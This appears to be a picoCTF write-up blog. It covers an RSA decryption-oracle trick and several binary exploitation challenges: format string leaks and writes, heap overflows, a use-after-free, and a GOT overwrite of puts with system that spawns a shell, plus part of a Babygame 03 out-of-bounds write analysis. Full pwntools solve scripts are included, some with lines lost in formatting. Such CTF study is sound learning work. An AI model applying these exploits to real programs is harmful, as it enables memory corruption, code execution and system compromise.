We are given an encoded password and secret file with also a remote instance to connect to

Checking the given files shows this image

From the challenge hint we know that we are meant to decrypt the AES encrypted file (secret.enc) but it needs a password

So the password file given is actually the encrypted password also that means we would need to get the plaintext form of the encrypted password

Now that we know that let’s connect to the remote instance image

On connecting to it i saw that this is a service which encrypts and decrypts values for us

We can try to encrypt a word image

Here i encrypted pwn and the ciphertext is 2047850252706091840405479775769742652500446636392769116787296844217713229548194309699205024040158803529449603571974932458613731680043863948321059171243239

Let’s decrypt it image

Ok nice we can encrypt and decrypt

So bascially this is an oracle because it’s offering to decrypt any ciphertext we give it

And we know that it implements RSA

For the encryption/decryption part of RSA it computes this:

## Encryption
ct = (m ^ e) mod n

## Decryption
m = (ct ^ d) mod n

When we try to decrypt the ciphertext we get this error image

So no easy win :)

Now how do we exactly trick this oracle to give me the flag?

I made some research and found this

So here’s how to craft the ciphertext

First we already know that the server computes m = (ct ^ d) mod n and ct = (m ^ e) mod n

Because the server check that we don’t ask for the decryption of the flag, you can’t give it the ciphertext right away, we need to modify it in a way to trick the server into thinking it’s something else

The modification must be carefully chosen so that we can revert the process once we get the response of the server

For instance, we can’t just add one and expect to subtract 1 from the output

The trick is the multiply the ciphertext with another ciphertext ct2 from which we know the plaintext

ct2 = (2 ^ e) mod n

Now the new ciphertext that you will send to the server will be:

C = ct * ct2
  = (m ^ e) * (2 ^ e)
  = ((2m) ^ e)
  = 2m^e

The server will give you back:

pt = (2(C ^ e) ^ d) mod n
   = 2*m

Now we just divide pt by 2 and that’s the password

You must choose a small value because the computations are made modulo n, so if the result gets too big we wont be able to know the real value

With that said I wrote a solve script

from pwn import *
from Crypto.Util.number import long_to_bytes
from warnings import filterwarnings

io = remote("titan.picoctf.net", 61923)

io.recvuntil("n) ")

ct1 = int(io.recvline().decode())
ct2 = 2575135950983117315234568522857995277662113128076071837763492069763989760018604733813265929772245292223046288098298720343542517375538185662305577375746934
C = ct1 * ct2
# print(ct1)
# print(ct2)


io.recvuntil(": ")
pt = long_to_bytes(int((io.recvline().decode().split()[-1]), 16) // 2)
print(f"AES Password: {pt}")


Running that we get the aes key which we can then go ahead decrypting secret.enc image

Flag: picoCTF{su((3ss_(r@ck1ng_r3@_24bcbc66}

Binary Exploitation 9/10 :~

Format String 0


We are given a binary and the source code with a remote instance to connect to

Downloading the attached file and checking the source shows this image image image

Since this was the first challenge in this category I felt lazy to read the source code but i saw some interesting things just by looking at it

Ok that doesn’t make much sense but looking at the part where we select a burger i saw this

#define BUFSIZE 32

char choice1[BUFSIZE];
scanf("%s", choice1);
char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
if (!on_menu(choice1, menu1, 3)) {
    printf("%s", "There is no such burger yet!\n");
} else {
    int count = printf(choice1);
    if (count > 2 * BUFSIZE) {

First we read in the choice using scanf and it’s stored in the buffer choice1 then it stores some burgers in the menu1 array and if our input is among the buffer array then it calls printf on our choice and then it saves the return value from calling printf to an integer variable count then checks if count is greater than 2 * BUFSIZE. If the check returns True then it calls the server_bob function

There are two vulnerabilities here:

The first one is when it receives our input, we can see that when it calls scanf it doesn’t specify to number of bytes to read in which causes the overflow since the choice buffer can only hold up just 32 bytes

So at this point of knowing that I basically just decided to spam ‘A’s image

It also worked remotely image

But looking back at the challenge this is probably not a good way to solve this even though it works

So let me talk about the second vuln which is format string bug

I saw that when it wants to store the result of printf to variable count, printf would print out our choice without using a format specifier

That’s what leads to the format string bug

But how exactly do we leverage that when it eventually checks if the count is greater than 64 (2 * 32)

Since we are meant to choose from the menu I noticed that menu1[1] has a format specifier in it


In other words when printf is called it would also do printf(%114d)

And the return value from calling printf is the number of characters printed (excluding the null byte used to end output to strings).

So when %114d is passed to printf the number of bytes returned would be 114

We can check this out by making a dummy script –> compiling it and setting a breakpoint after printf is called

#include <stdio.h>

int main(){
    char value[32];
    scanf("%s", value);
    int count = printf(value);
    printf("\nsize: %d\n", count);

    return 0;

image image

We can see that rax is 0x72 == 144 and that’s greater than 64 with that we can get us to the next function serve_bob

Doing that works image

Now for the next function it’s also similar

char choice2[BUFSIZE];
scanf("%s", choice2);
char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
if (!on_menu(choice2, menu2, 3)) {
    printf("%s", "There is no such burger yet!\n");
} else {

We just choose menu[2] which then does printf(%s%s%s)

But is that meant to give the flag?

Rather how did we get the flag initially with the buffer overflow

Well I didn’t say this at first but there’s a function which handle signals

void sigsegv_handler(int sig) {
    printf("\n%s\n", flag);

signal(SIGSEGV, sigsegv_handler);

In this case once the program sees a SIGSEGV signal it would call the handler function which helps us print the flag

That’s why the buffer overflow when caused produces a SIGSEGV signal which we then got the flag

To see this we can try it in a debugger and cause an overflow

I set a breakpoint at the point where server_patrick function wants to return image image

If we move to next instruction we would see that we triggered the SIGSEGV signal image

But how exactly can we acheive a SIGSEGV signal with this uncontrollable format string bug

Here’s how it’s possible, remember that the choice two would do printf(%s%s%s)

And what printf would interpret is that:

But what if that address pointer is invalid what happens? Well the SIGSEGV signal is triggered

So now that we know that, we just choose it and hope the address at the first offset is invalid

Doing that I got the flag image

Flag: picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_63191ce6}

Heap 0


Same as before we are given the binary and the source code then a remote instance to connect to

After downloading the attached file I ran the binary to get an overview of what it does image

Basically we are given the heap current state and our goal is to overwrite the value stored in 0x55e878c0d6b0……the current value is “bico”

We have 5 menu options image

Each option does what it exactly says

Now time to look for the vulnerability

I will only show the one’s i find important if you want to take a look at the full source code you can check it here

First the init function:

#define FLAGSIZE_MAX 64
#define SAFE_VAR_SIZE 5

int num_allocs;
char *safe_var;
char *input_data;

void init() {
    printf("\nWelcome to heap0!\n");
        "I put my data on the heap so it should be safe from any tampering.\n");
    printf("Since my data isn't on the stack I'll even let you write whatever "
           "info you want to the heap, I already took care of using malloc for "
    input_data = malloc(24);
    strncpy(input_data, "pico", INPUT_DATA_SIZE);
    safe_var = malloc(SAFE_VAR_SIZE);
    strncpy(safe_var, "bico", SAFE_VAR_SIZE);

This function would allocate memory of size 24 on the heap and then move “pico” into input_data

Then it also allocates memory of size 5 on the heap and then moves “bico” into safe_var

Note that both input_data & safe_var are the heap memory address

Next function:

void write_buffer() {
    printf("Data for buffer: ");
    scanf("%s", input_data);

This would allow us write any amount of bytes to the input_data heap chunk since scanf was used without specifying the number of bytes to read in causing a heap overflow since our input is on the “heap”

And finally this function:

void check_win() {
    if (strcmp(safe_var, "bico") != 0) {
        printf("\nYOU WIN\n");

        // Print flag
        char buf[FLAGSIZE_MAX];
        FILE *fd = fopen("flag.txt", "r");
        fgets(buf, FLAGSIZE_MAX, fd);
        printf("%s\n", buf);

    } else {
        printf("Looks like everything is still secure!\n");
        printf("\nNo flage for you :(\n");

It checks if safe_var isn’t bico and if it isn’t we get the flag

Looking at this we can tell the goal is to overwrite the value of bico to anything we want

To do that we need to get the offset between our input and the safe_var on the heap

I used pwndbg for this

After running the binary in pwndbg I just CTRL+C and looked at the heap chunks image image image

We see that our input is at 0x5555555596b0 and the address of the value where we want to overwrite is 0x5555555596d0

Just take the difference and that gives the offset (32)

Now we can just overwrite the value there

Here’s my solve script

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from warnings import filterwarnings

# Set up pwntools for the correct architecture
exe = context.binary = ELF('chall')

context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: 
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
        return process([exe.path] + argv, *a, **kw)

gdbscript = '''

#                    EXPLOIT GOES HERE

def init():
    global io

    io = start()

def write(data):
    io.sendafter("buffer:", data)

def solve():
    write(b'A'*0x20 + b'A'*4)


def main():

if __name__ == '__main__':

Running it works and I got the flag image

Flag: picoCTF{my_first_heap_overflow_76775c7c}

Format String 1


Same as usual we are given the source code

Here’s the source code

#include <stdio.h>

int main() {
  char buf[1024];
  char secret1[64];
  char flag[64];
  char secret2[64];

  // Read in first secret menu item
  FILE *fd = fopen("secret-menu-item-1.txt", "r");
  if (fd == NULL){
    printf("'secret-menu-item-1.txt' file not found, aborting.\n");
    return 1;
  fgets(secret1, 64, fd);
  // Read in the flag
  fd = fopen("flag.txt", "r");
  if (fd == NULL){
    printf("'flag.txt' file not found, aborting.\n");
    return 1;
  fgets(flag, 64, fd);
  // Read in second secret menu item
  fd = fopen("secret-menu-item-2.txt", "r");
  if (fd == NULL){
    printf("'secret-menu-item-2.txt' file not found, aborting.\n");
    return 1;
  fgets(secret2, 64, fd);

  printf("Give me your order and I'll read it back to you:\n");
  scanf("%1024s", buf);
  printf("Here's your order: ");


  return 0;

First it opens up the file secret-menu-item-1.txt and stores the content to secret1, then it opens up the flag file and store the content to flag and finally opens up secret-menu-item-2.txt and stores the content to secret2

Next it receives our input using scanf and we can read in 1024 bytes which is stored in buf

And lastly it prints out our input using printf without using a format specifier

So the vulnerability here is format string bug

And the goal is to get the flag which is stored on the stack

We can leak it using %p and also make use of %{offset}$p to leak values at specified offset

I wrote a script to achieve this

Here’s my solve script

from pwn import *

context.log_level = 'info'

flag = ''

for i in range(0, 20):
        # io = remote('mimas.picoctf.net', 63564, level='warn')
        io = process("./format-string-1")
        io.recvuntil('order: ')
        result = io.recvline()
        if not b'nil' in result:
            print(str(i) + ': ' + str(result))
                decoded = unhex(result.strip().decode()[2:])
                reversed_hex = decoded[::-1]
                flag += reversed_hex.decode()
            except BaseException:
    except EOFError:


Running it gives the flag image

Flag: picoCTF{4n1m41_57y13_4x4_f14g_50396c64}

Heap 1


This was the same code as the previous one (heap 0) except that this time the check_win function performs operation differently

You can take a look at the source code here

Here’s the difference:

void check_win() {
    if (!strcmp(safe_var, "pico")) {
        printf("\nYOU WIN\n");

        // Print flag
        char buf[FLAGSIZE_MAX];
        FILE *fd = fopen("flag.txt", "r");
        fgets(buf, FLAGSIZE_MAX, fd);
        printf("%s\n", buf);

    } else {
        printf("Looks like everything is still secure!\n");
        printf("\nNo flage for you :(\n");

This time around it checks if the safe_var equals pico

That means instead of us overwriting it with junk we should overwrite it to pico

The offset was still 32 and with that said here’s my solve script

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from warnings import filterwarnings

# Set up pwntools for the correct architecture
exe = context.binary = ELF('chall')

context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: 
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
        return process([exe.path] + argv, *a, **kw)

gdbscript = '''

#                    EXPLOIT GOES HERE

def init():
    global io

    io = start()

def write(data):
    io.sendafter("buffer:", data)

def solve():


def main():

if __name__ == '__main__':

Running it gives the flag image

Flag: picoCTF{starting_to_get_the_hang_e9fbcea5}

Heap 2


Almost similar to the previous ones but this time around we it’s this:

int num_allocs;
char *x;
char *input_data;

void win() {
    // Print flag
    char buf[FLAGSIZE_MAX];
    FILE *fd = fopen("flag.txt", "r");
    fgets(buf, FLAGSIZE_MAX, fd);
    printf("%s\n", buf);


void check_win() { ((void (*)())*(int*)x)(); }

void init() {

    printf("\nI have a function, I sometimes like to call it, maybe you should change it\n");

    input_data = malloc(5);
    strncpy(input_data, "pico", 5);
    x = malloc(5);
    strncpy(x, "bico", 5);

So it allocates memory of size 5 on the heap where the pointer is stored in x and then it moves bico to x and also input_data stores the heap pointer returned by malloc where the size allocated is 5

Our goal is to overwrite the value of bico to what?

The check_win condition for this challenge is that it casts the value of x as code meaning that it will call whatever value is stored in the heap pointer x making the program flow will continue from there

Since PIE isn’t enabled…….oops I haven’t been doing that :( image

We can therefore overwrite the value of bico to the address of the win function so that when we use option 4 it would give us the flag

The offset is at 32

Here’s my solve script

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from warnings import filterwarnings

# Set up pwntools for the correct architecture
exe = context.binary = ELF('chall')

context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: 
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
        return process([exe.path] + argv, *a, **kw)

gdbscript = '''

#                    EXPLOIT GOES HERE

def init():
    global io

    io = start()

def write(data):
    io.sendafter("buffer:", data)

def solve():


def main():

if __name__ == '__main__':

Running it gives the flag image

Flag: picoCTF{and_down_the_road_we_go_856288fc}

Heap 3


This time around the source code is entirely different but yet similiar

You can find the whole source code here

Let’s see what it does:

First it creates a structure named object with 4 fields where each field is of type char, then it defines the pointer x which points to the structure created. In the init function it sets x->flag to pico

typedef struct {
  char a[10];
  char b[10];
  char c[10];
  char flag[5];
} object;

int num_allocs;
object *x;

void init() {

    printf("\nfreed but still in use\nnow memory untracked\ndo you smell the bug?\n");

    x = malloc(sizeof(object));
    strncpy(x->flag, "bico", 5);

Now let’s see the options it provides image

We can allocate object and here’s the code handling that

void alloc_object() {
    printf("Size of object allocation: ");
    int size = 0;
    scanf("%d", &size);
    char* alloc = malloc(size);
    printf("Data for flag: ");
    scanf("%s", alloc);

We can control the size of what we want to allocate and write to it. Using scanf it receives our input which is stored to the pointer we allocated without specifying the number of bytes we can read in causing a heap overflow

We can free the structure pointer x, but notice that after it frees the memory it doesn’t set it to NULL

void free_memory() {

And finally to get the flag with option 5 we need to set x->flag to pico

void check_win() {
  if(!strcmp(x->flag, "pico")) {
    printf("YOU WIN!!11!!\n");

    // Print flag
    char buf[FLAGSIZE_MAX];
    FILE *fd = fopen("flag.txt", "r");
    fgets(buf, FLAGSIZE_MAX, fd);
    printf("%s\n", buf);


  } else {
    printf("No flag for u :(\n");
  // Call function in struct

Now what are the bugs so far?

Here’s how the exploit flow goes:

Then i fill in the struct 3 fields with junks and on the 30th offset which is where the flag field is x-flag i filled it with pico

Here’s my solve script

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from warnings import filterwarnings

# Set up pwntools for the correct architecture
exe = context.binary = ELF('chall')

context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: 
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
        return process([exe.path] + argv, *a, **kw)

gdbscript = '''
break *main+415
break *main+318

#                    EXPLOIT GOES HERE

def init():
    global io

    io = start()

def alloc(size, data):

def free():

def solve():
    alloc(0x28, "B"*30 + "pico")


def main():

if __name__ == '__main__':

Running it gives the flag image

Flag: picoCTF{now_thats_free_real_estate_f8fb9f96}

Format String 2


We are given the source code and binary

Checking the source code shows this image

Here’s what it does:

From this we can see that the vulnerability is format string bug and our goal is to change the value of sus to 0x67616c66

To do that we need to first get the offset of our input on the stack before printf is called

When using a format specifier, printf will start printing values out, in order of calling convention

Because this is a 64bits binary the calling convention would be:

rsi --> rdx --> rcx --> r8 --> r9 --> [rsp] --> [rsp+8] ....

Now to get the offset on the stack I set a breakpoint at main+95 which is the call to printf@plt

Starting the process i hit the breakpoint image image

Looking at the first 20 qwords of the stack i got this

pwndbg> x/20gx $rsp
0x7fffffffd830: 0x00007ffff7ffe658      0x00007fff00000000
0x7fffffffd840: 0x00007ffff7ffe2d0      0x00000000ffffffff
0x7fffffffd850: 0x00007ffff7fcb7b0      0x00007ffff7ffdab0
0x7fffffffd860: 0x0000000000000001      0x00007fffffffd990
0x7fffffffd870: 0x4141414141414141      0x0000000000000000
0x7fffffffd880: 0x0000000000000000      0x00007ffff7fcbca8
0x7fffffffd890: 0x00007fffffffd9d0      0x00007ffff7fcb7b0
0x7fffffffd8a0: 0x0000000000000006      0x0000001d00000006
0x7fffffffd8b0: 0x00007ffff7ffdab0      0x00007ffff7fd8d2d
0x7fffffffd8c0: 0x0000000000000000      0x00007ffff7fd9f08

We can see that our offset is at 9 because it contains 0x4141414141414141 but that’s not going to be the final value because we need to consider the calling convention so we add 5 making it 14

So that means the offset is 14. Alternatively I wrote a fuzz script which would just get the offset and here’s the script image

With that said we can now easily overwrite the global variable to a desired value using pwntools fmtstr_payload function

Here’s my solve script

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from warnings import filterwarnings

# Set up pwntools for the correct architecture
exe = context.binary = ELF('vuln')

context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: 
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
        return process([exe.path] + argv, *a, **kw)

gdbscript = '''

#                    EXPLOIT GOES HERE

def init():
    global io

    io = start()

def solve():
    offset = 14

    sus = exe.sym['sus']
    overwrite = 0x67616c66
    write = {sus: overwrite}

    payload = fmtstr_payload(offset, write)
    print(f"Payload: {payload}")


def main():

if __name__ == '__main__':

Running it gives the flag image

Flag: picoCTF{f0rm47_57r?_f0rm47_m3m_741fa290}

Format String 3


We are given a binary, source code, libc, ld files and a remote instance to connect to

First thing i did was to patch the binary with the provided libc file inorder to make sure that the offsets is the same as the one remotely

Now looking at the source code i saw this image

#include <stdio.h>

#define MAX_STRINGS 32

char *normal_string = "/bin/sh";

void setup() {
        setvbuf(stdin, NULL, _IONBF, 0);
        setvbuf(stdout, NULL, _IONBF, 0);
        setvbuf(stderr, NULL, _IONBF, 0);

void hello() {
        puts("Howdy gamers!");
        printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);

int main() {
        char *all_strings[MAX_STRINGS] = {NULL};
        char buf[1024] = {'\0'};


        fgets(buf, 1024, stdin);


        return 0;

From this we can tell that the vulnerability is format string bug since it prints out our input without a format specifier

Ok now what’s the attack strategy?

Looking at the binary protections i got this image

We are working with a 64bits binary which is dynamically linked and not stripped. The protections enabled are just Stack Canary and NX

The fact that RELRO is partial makes the global offset table (GOT) to be writable

That means we can overwrite the GOT of any function available

In the previous challenge we had to overwrite a global variable and the same way i got the offset is what i did here too

Here’s my fuzzing script

Now that we know the offset what should we overwrite?

At the end of the printf call we see that it calls puts on /bin/sh

So we can overwrite puts@got to system@libc

But how do we calculate the address of system in the libc?

Remember that we’ve been given a libc leak so all i did was to first calculate the libc base address then got the address of system within libc

With that after we perform the overwrite instead of it to call puts it would rather spawn a shell

Here’s my solve script

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from warnings import filterwarnings

# Set up pwntools for the correct architecture
exe = context.binary = ELF('format-string-3_patched')
libc = exe.libc

context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: 
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
        return process([exe.path] + argv, *a, **kw)

gdbscript = '''

#                    EXPLOIT GOES HERE

def init():
    global io

    io = start()

def solve():
    offset = 38

    io.recvuntil('libc: ')
    setvbuf = int(io.recvline().strip(), 16)
    libc.address = setvbuf - libc.sym['setvbuf']
    info("Libc base: %#x", libc.address)

    system = libc.address + 0x4f760
    write ={exe.got['puts']: system}

    payload = fmtstr_payload(offset, write)


def main():

if __name__ == '__main__':

Running it works and i got the flag image

Flag: picoCTF{G07_G07?_d285a282}

Babygame 03


Note that this is a sequel to last year picoctf babygame series so it would help in knowing how to solve the other two

But i’ll just try to explain it here

We are given a binary and no source code with a remote instance to connect to

After downloading the binary i checked the file type and protections enabled image

We are working with a x32 binary which is dynamically linked and not stripped with the only protection being enabled to be NX

Ok let’s run the binary to get an overview of what it does

On running it we are presented with a game like sort of structure where we have the: player’s position which are shown as the x,y coordinates, current level, end tile position in it’s coordinate form and the number of lives left image

We are also see that the player is represented by @

Initial knowledge of the previous babygame series I saw that we can move around the map using w,a,s,d

Ok but this time I want to work on it as if i never did those two previous ones

So if that was the case we could have just guessed it because that’s like the standard gaming key for such type of thing

If we try to send the movement characters with keyboard it will decrement the lives by 2 but that’s not meant to be right

Inorder to prevent this I just made a function wrapper to deal with moving the player’s character on the map

Before i show that here let’s reverse engineer the program to see it’s funtionality well and as well the vulnerability

Opening it up and Ghidra and decompiling it, here’s the main function: image

It may not look well but that’s manageable to read

Ok so let’s go through what it does (i’ll just give the important portion)

First it initializes the player by calling the init_player() function

Looking at the pseudocode shows this image

void init_player(undefined4 *param_1)

  *param_1 = 4;
  param_1[1] = 4;
  param_1[2] = 0x32;

We can tell that this is the player’s structure because it’s setting y, x, lives field to the initial value we saw when we ran the program

Inorder for readability I want to create a new struct type in Ghidra called player which should be this

typedef struct player {
    int y;
    int x;
    int lives;
} player;

To do that look at the “Data Type Manager” tab image

Then click on game --> {right click} --> New --> Structure

Doing that you should get this image

Ok from the fields of the player’s structure each is of type int and the size of an integer in C is 4 bytes

That means the size of the struct should be 12

So we just add that in the “Structure Editor” image

Now we just need to fill in the data type correctly and give it a name and that’s all image

With this done let us change the data type in the init_player() function to the player struct

To do that click CTRL+L and change it to player *

Doing that we should get this image

Ok that’s now more readable and clear at this point we can just rename the variable and continue with reversing image

void init_player(player *player)

  player->y = 4;
  player->x = 4;
  player->lives = 0x32;

Back to the main function the next function that’s called is init_map() image

After some renaming and correct data type changing i got this image

void init_map(char *map,player *player,int *level)

  int random;
  int i;
  int j;
  j = 0;
  do {
    if (0x1d < j) {
    for (i = 0; i < 0x5a; i = i + 1) {
      if ((j == 0x1d) && (i == 0x59)) {
        map[0xa8b] = 'X';
      else if ((j == player->y) && (i == player->x)) {
        map[i + j * 0x5a] = player_tile;
      else {
        random = rand();
        if (j == random % *level) {
          random = rand();
          if (i == random % *level) {
            map[i + j * 0x5a] = '#';
            goto inc;
        map[i + j * 0x5a] = '.';
    j = j + 1;
  } while( true );

This function does exactly what it says….it initializes the map

Ok one thing to note is that the map is an array that can hold up 2700 bytes

char map [2700];

Next function does exactly what it says image

void print_map(char *map,player *player,int level)

  int j;
  int i;
  for (i = 0; i < 0x1e; i = i + 1) {
    for (j = 0; j < 0x5a; j = j + 1) {
      putchar((int)map[j + i * 0x5a]);

Now this the the part that deals with how the game works based on our input image

undefined4 main(void)

  int inp;
  int level;
  player player;
  char map [2700];
  char value;
  int i;
  undefined *local_10;
  local_10 = &stack0x00000004;
  level = 1;
  i = 0;
  do {
    inp = getchar();
    position = (char)inp;
    if (((player.y == 0x1d) && (player.x == 0x59)) && (level != 4)) {
      puts("You win!\n Next level starting ");
      i = i + 1;
      level = level + 1;
  } while (((player.y != 0x1d) || (player.x != 0x59)) || ((level != 5 || (i != 4))));
  return 0;

Here’s what it does:

At this point we can kind of tell what’s the “goal”

We need to move the player to the end of the map (29, 89) and the level and i must be 5 and 4

But if you look well you would see that the level was initialized as 1 while i as 0

And there’s a weird condition in the part that deals with how we can increment our level and i

It would only increment when we are at the end of the map and the level is not equal to 4

Do you see it?

If the level is not equal to 4 means we can only get to pass that comparism 3 times

Meaning we can only get to set level and i to 4 and 3

And the condition set for the loop to exit and call the win() function is when the player’s position is at the end of the map (29, 89), the level is 5, and i is 4

Ok that looks impossible to achieve “for now :)”

Back to reversing…..If we are able to break out of the loop it would call the win function passing the level as the parameter

Looking at the pseudocode shows this image

This would open up the flag file and print it’s content to stdout only when the level is 5

OK at this point we know that the level must surely equal 5 to get the flag

Now let us take a look at the function that moves the player around the map image

void move_player(player *player,char position,char *map,int level)

  int value;
  if (player->lives < 1) {
    puts("No more lives left. Game over!");
                    /* WARNING: Subroutine does not return */
  if (position == 'l') {
    value = getchar();
    player_tile = (char)value;
  if (position == 'p') {
  map[player->x + player->y * 0x5a] = '.';
  if (position == 'w') {
    player->y = player->y + -1;
  else if (position == 's') {
    player->y = player->y + 1;
  else if (position == 'a') {
    player->x = player->x + -1;
  else if (position == 'd') {
    player->x = player->x + 1;
  if (map[player->x + player->y * 0x5a] == '#') {
    puts("You hit an obstacle!");
                    /* WARNING: Subroutine does not return */
  map[player->x + player->y * 0x5a] = player_tile;
  player->lives = player->lives + -1;

First thing it does is to make sure the player’s live isn’t less than 1

Then it does this:

map[player->x + player->y * 0x5a] = '.';

Basically what that does is to set the previous location of the player’s position to .

Based on the position we choose it will update the coordinates (y, x)

w --> move up
s --> move down
a --> move left
d --> move right

But there are two position that were not known to us and they are l & p

We can use l to change the value of the player character

  if (position == 'l') {
    value = getchar();
    player_tile = (char)value;

While p is used to automatially solve the map

  if (position == 'p') {

And it achieves that by moving the player on the map based on certain conditions image

Ok back to the move_player() function the last part is this

if (map[player->x + player->y * 0x5a] == '#') {
puts("You hit an obstacle!");
                /* WARNING: Subroutine does not return */
map[player->x + player->y * 0x5a] = player_tile;
player->lives = player->lives + -1;

Basically this checks if we are at (0, 1) and if we are there then we hit the obstable and the program exits, we can try this out image

But if that’s not the case it updates the current value of the player on the map to the player_tile character and decrements the player’s live by 1

And returns……..

Ok that’s all the important function i wanted to show

Now that we are harmed with this information what exactly is the bug?

You can try to find it but if you can’t do that here’s the bug:

map[player->x + player->y * 0x5a] = player_tile;

While updating our player’s character, it does that based on the position of the character on the map

It calculates the position using the player’s x and y value

But there’s nothing stopping us from using a negative value of x or y

Here’s an example, if x is at -1 and y is at 0

The position would then be:

map[-1 + (0 * 90)]
map[-1 + 0]

With that we have out of bound write

Out of bound meaning we can make arbitrary writes out of the map array bound?

But looking back at the pseudocode well we can find a problem which is this

map[player->x + player->y * 0x5a] = '.';

It would set the previous value of the map character to .

So let’s say we are at map[0] and we move to map[-1] the value stored in map[0] would be set to . same as when we move from map[-1] to map[-2] the value stored there at map[-1] would be set to .

What that is doing is going to prevent us from making arbitrary write to memory but that doesn’t stop us because we still control one byte

Therefore if we are to overwrite any value on the stack it would just one byte we would be overwritting

Now even if we could overwrite an address with just a byte what do we want to do with that?

Remember from the main function that weird condition which prevents us from making level to 5 and i to 4, how do we also go about that?

Inorder to deal with all this issue we first need to be able to move around the map freely because we have very limited lives

So my first goal would be to overwrite the players->lives value to a large number

Firstly let’s disable ASLR so that the addresses would be the same as it makes calculating offsets easier

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Ok now how did I calculate the offset of map -> lives

Looking at the main function before it called print_map the parameter passed into the function are map, players's structure, level image

So I set a breakpoint at the call to print_map and after starting the process I hit the breakpoint and got this image

 ► 0x80498e9 <main+120>    call   print_map                     <print_map>
        arg[0]: 0xffffc3ef ◂— 0x2e2e2e23 ('#...')
        arg[1]: 0xffffc3e0 ◂— 0x4
        arg[2]: 0xffffc3dc ◂— 0x1

Ok from this we know that:

map == 0xffffc3ef
player-> lives = 0xffffc3e0+8
level == 0xffffc3dc

So now i calculated the offset of the map to the player->lives structure to be:

= player->lives - map
= 0xffffc3e8-0xffffc3ef
= -7

That means if we go to map[-7] it would be the address of player->lives

In order to achieve this we need to set x to -6 and y to 0

map[x + (y * 90)]
map[-6 + 0]

Also remember that the initial position of (x, y) are (4, 4)

So that means to reach -6 we need to move x to a*10 and y to w*4

You may notice I used -6 instead of -7 the reason is because of this

Let’s say the address of player->lives is 0xffffc3e8

And it contains this:

0xffffc3e8: 0x00000031

If we overwrite -7 that’s going to be the lsb of that address meaning it would just eventually overwrite 0x31 to our current player character then if we move again around the map it would replace 0x31 with 0x2e --> '.'

That would rather decrease the live so rather than overwriting the lsb i overwrote it to be:

0xffffc3e8: 0x00002e31

Ok now with that said I did just that

Here’s the wrapper function I made use of

class Player:
    def __init__(self, y, x):
        self.x = x
        self.y = y

    def get_position(self):
        return (self.x, self.y)
    def get_relative_index(self):
        return self.x + (self.y * 0x5a)
    def move(self, direction):
        match direction:
            case 'a':
                self.x -= 1
            case 'd':
                self.x += 1
            case 'w':
                self.y -= 1
            case 's':
                self.y += 1
        log.info(f'Player position (x, y): {self.get_position()} | map[{self.get_relative_index()}]')

def read_map():
    return io.recv(0x6c7)

def send_movement(player, direction, read=True):
    str_direction = direction.decode('utf-8')
    log.info(f'Sending {str_direction}')
    for c in str_direction:
        if read: read_map()

def change_tile_character(lower_byte):
    io.send(b'l' + lower_byte)
    log.info(f'Changing tile to: {lower_byte.decode("utf-8")}')
    # read_map()

def solve():
    player = Player(4, 4)

    def get_lives():
        Get large amount of lives
        send_movement(player, b'a'*10)
        send_movement(player, b'w'*4)

        # {-7, 0}

    def reset():
        Reset the co-ordinates to (4, 4)
        send_movement(player, b's'*4)
        send_movement(player, b'd'*10)


Btw we are just basically taking advantage of the fact that it will update the previous location of the map to the current player tile character to get larger lives

Now after that we can get large lives image image

With that we can move around the map freely what next?

Back to the main function we know that we need a way to increment the level and i but as of now that is impossible because of the logic that handles it

Ok i won’t say totally impossible because we are going to bypass this

One thing we should know is that when a function is called it creates a stack frame, and then when it’s about to return the next instruction of the function which it was called from would be placed in the instruction pointer which then makes the program returns from the current function

Let’s take this as example:

Dump of assembler code for function main:
   0x08049927 <+182>:   call   0x8049533 <move_player>
   0x0804992c <+187>:   add    esp,0x10

Dump of assembler code for function move_player:
   0x08049533 <+0>:     push   ebp
   0x08049534 <+1>:     mov    ebp,esp
   0x08049536 <+3>:     push   esi
   0x08049537 <+4>:     push   ebx
   0x08049538 <+5>:     sub    esp,0x10
   ........... instructions ----------
   0x0804969c <+361>:   pop    ebx
   0x0804969d <+362>:   pop    esi
   0x0804969e <+363>:   pop    ebp
   0x0804969f <+364>:   ret

From the main function, when it calls move_player it would store the next instruction which is add esp, 0x10 to the stack

Then function move_player would create a new stack frame and after it does whatever it wants to do, it would then set esp to the next instruction which is in main i.e add esp, 0x10

Ok let’s just test this out for you to see

In gdb i’ll set a breakpoint at this following places:

- main+182
- move_player+361

Starting the process and using w hits the first breakpoint image

We can see that the stack is still it’s normal value but once we step into this function we get this image

Cool we see that the stack address 0xffffc3ac is pointing to the next instruction in main

